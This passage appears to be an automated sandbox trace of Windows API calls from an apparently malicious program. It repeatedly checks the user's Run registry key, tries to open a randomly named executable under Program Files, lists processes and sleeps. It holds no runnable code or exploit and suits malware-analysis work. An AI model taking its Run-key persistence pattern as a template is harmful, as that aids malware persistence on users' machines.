SecurityQualityOfService=0x0), IoStatusBlock=0x19ea44, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19ea5c*=0x0, IoStatusBlock=0x19ea44*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0253.111] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0253.111] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x2e0000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0253.112] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x2e0000, ResultLength=0x0) returned 0x0 [0253.204] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x2e0000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0253.205] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0253.208] NtCreateKey (in: KeyHandle=0x19ea74, DesiredAccess=0x20219, ObjectAttributes=0x19e1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x19ea74*=0x14c) returned 0x0 [0253.208] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x19e438, Length=0x200, ResultLength=0x19e838 | out: KeyValueInformation=0x19e438, ResultLength=0x19e838) returned 0x0 [0253.208] NtClose (Handle=0x14c) returned 0x0 [0253.208] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19e820, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0253.208] NtCreateFile (in: FileHandle=0x19e840, DesiredAccess=0x120089, ObjectAttributes=0x19e808*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19e828, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19e840*=0x0, IoStatusBlock=0x19e828*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0253.208] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0253.208] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19ea3c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0253.208] NtCreateFile (in: FileHandle=0x19ea5c, DesiredAccess=0x120089, ObjectAttributes=0x19ea24*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19ea44, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19ea5c*=0x0, IoStatusBlock=0x19ea44*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0253.208] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0253.208] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x2e0000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0253.209] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x2e0000, ResultLength=0x0) returned 0x0 [0253.300] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x2e0000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0253.301] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0253.319] NtCreateKey (in: KeyHandle=0x19ea74, DesiredAccess=0x20219, ObjectAttributes=0x19e1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x19ea74*=0x14c) returned 0x0 [0253.319] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x19e438, Length=0x200, ResultLength=0x19e838 | out: KeyValueInformation=0x19e438, ResultLength=0x19e838) returned 0x0 [0253.319] NtClose (Handle=0x14c) returned 0x0 [0253.319] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19e820, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0253.319] NtCreateFile (in: FileHandle=0x19e840, DesiredAccess=0x120089, ObjectAttributes=0x19e808*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19e828, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19e840*=0x0, IoStatusBlock=0x19e828*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0253.319] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0253.319] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19ea3c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0253.319] NtCreateFile (in: FileHandle=0x19ea5c, DesiredAccess=0x120089, ObjectAttributes=0x19ea24*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19ea44, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19ea5c*=0x0, IoStatusBlock=0x19ea44*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0253.320] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0253.320] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x2e0000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0253.320] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x2e0000, ResultLength=0x0) returned 0x0 [0253.413] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x2e0000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0253.413] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0253.426] NtCreateKey (in: KeyHandle=0x19ea74, DesiredAccess=0x20219, ObjectAttributes=0x19e1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x19ea74*=0x14c) returned 0x0 [0253.426] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x19e438, Length=0x200, ResultLength=0x19e838 | out: KeyValueInformation=0x19e438, ResultLength=0x19e838) returned 0x0 [0253.426] NtClose (Handle=0x14c) returned 0x0 [0253.426] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19e820, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0253.426] NtCreateFile (in: FileHandle=0x19e840, DesiredAccess=0x120089, ObjectAttributes=0x19e808*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19e828, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19e840*=0x0, IoStatusBlock=0x19e828*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0253.426] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0253.426] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19ea3c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0253.426] NtCreateFile (in: FileHandle=0x19ea5c, DesiredAccess=0x120089, ObjectAttributes=0x19ea24*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19ea44, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19ea5c*=0x0, IoStatusBlock=0x19ea44*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0253.427] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0253.427] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x2e0000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0253.427] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x2e0000, ResultLength=0x0) returned 0x0 [0253.524] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x2e0000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0253.524] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0253.535] NtCreateKey (in: KeyHandle=0x19ea74, DesiredAccess=0x20219, ObjectAttributes=0x19e1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x19ea74*=0x14c) returned 0x0 [0253.536] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x19e438, Length=0x200, ResultLength=0x19e838 | out: KeyValueInformation=0x19e438, ResultLength=0x19e838) returned 0x0 [0253.536] NtClose (Handle=0x14c) returned 0x0 [0253.536] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19e820, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0253.536] NtCreateFile (in: FileHandle=0x19e840, DesiredAccess=0x120089, ObjectAttributes=0x19e808*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19e828, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19e840*=0x0, IoStatusBlock=0x19e828*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0253.536] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0253.536] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19ea3c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0253.536] NtCreateFile (in: FileHandle=0x19ea5c, DesiredAccess=0x120089, ObjectAttributes=0x19ea24*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19ea44, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19ea5c*=0x0, IoStatusBlock=0x19ea44*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0253.536] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0253.536] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x2e0000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0253.536] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x2e0000, ResultLength=0x0) returned 0x0 [0253.626] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x2e0000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0253.627] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0253.628] NtCreateKey (in: KeyHandle=0x19ea74, DesiredAccess=0x20219, ObjectAttributes=0x19e1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x19ea74*=0x14c) returned 0x0 [0253.628] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x19e438, Length=0x200, ResultLength=0x19e838 | out: KeyValueInformation=0x19e438, ResultLength=0x19e838) returned 0x0 [0253.628] NtClose (Handle=0x14c) returned 0x0 [0253.628] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19e820, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0253.628] NtCreateFile (in: FileHandle=0x19e840, DesiredAccess=0x120089, ObjectAttributes=0x19e808*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19e828, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19e840*=0x0, IoStatusBlock=0x19e828*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0253.629] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0253.629] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19ea3c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0253.629] NtCreateFile (in: FileHandle=0x19ea5c, DesiredAccess=0x120089, ObjectAttributes=0x19ea24*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19ea44, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19ea5c*=0x0, IoStatusBlock=0x19ea44*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0253.629] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0253.629] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x2e0000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0253.629] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x2e0000, ResultLength=0x0) returned 0x0 [0253.732] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x2e0000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0253.733] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0253.741] NtCreateKey (in: KeyHandle=0x19ea74, DesiredAccess=0x20219, ObjectAttributes=0x19e1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x19ea74*=0x14c) returned 0x0 [0253.742] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x19e438, Length=0x200, ResultLength=0x19e838 | out: KeyValueInformation=0x19e438, ResultLength=0x19e838) returned 0x0 [0253.742] NtClose (Handle=0x14c) returned 0x0 [0253.742] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19e820, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0253.742] NtCreateFile (in: FileHandle=0x19e840, DesiredAccess=0x120089, ObjectAttributes=0x19e808*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19e828, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19e840*=0x0, IoStatusBlock=0x19e828*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0253.742] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0253.742] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19ea3c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0253.742] NtCreateFile (in: FileHandle=0x19ea5c, DesiredAccess=0x120089, ObjectAttributes=0x19ea24*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19ea44, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19ea5c*=0x0, IoStatusBlock=0x19ea44*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0253.742] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0253.742] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x2e0000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0253.742] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x2e0000, ResultLength=0x0) returned 0x0 [0253.834] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x2e0000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0253.834] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0253.847] NtCreateKey (in: KeyHandle=0x19ea74, DesiredAccess=0x20219, ObjectAttributes=0x19e1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x19ea74*=0x14c) returned 0x0 [0253.847] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x19e438, Length=0x200, ResultLength=0x19e838 | out: KeyValueInformation=0x19e438, ResultLength=0x19e838) returned 0x0 [0253.847] NtClose (Handle=0x14c) returned 0x0 [0253.847] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19e820, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0253.847] NtCreateFile (in: FileHandle=0x19e840, DesiredAccess=0x120089, ObjectAttributes=0x19e808*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19e828, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19e840*=0x0, IoStatusBlock=0x19e828*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0253.847] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0253.847] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19ea3c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0253.847] NtCreateFile (in: FileHandle=0x19ea5c, DesiredAccess=0x120089, ObjectAttributes=0x19ea24*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19ea44, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19ea5c*=0x0, IoStatusBlock=0x19ea44*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0253.847] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0253.847] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x2e0000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0253.848] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x2e0000, ResultLength=0x0) returned 0x0 [0253.938] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x2e0000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0253.939] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0253.943] NtCreateKey (in: KeyHandle=0x19ea74, DesiredAccess=0x20219, ObjectAttributes=0x19e1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x19ea74*=0x14c) returned 0x0 [0253.943] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x19e438, Length=0x200, ResultLength=0x19e838 | out: KeyValueInformation=0x19e438, ResultLength=0x19e838) returned 0x0 [0253.943] NtClose (Handle=0x14c) returned 0x0 [0253.943] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19e820, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0253.943] NtCreateFile (in: FileHandle=0x19e840, 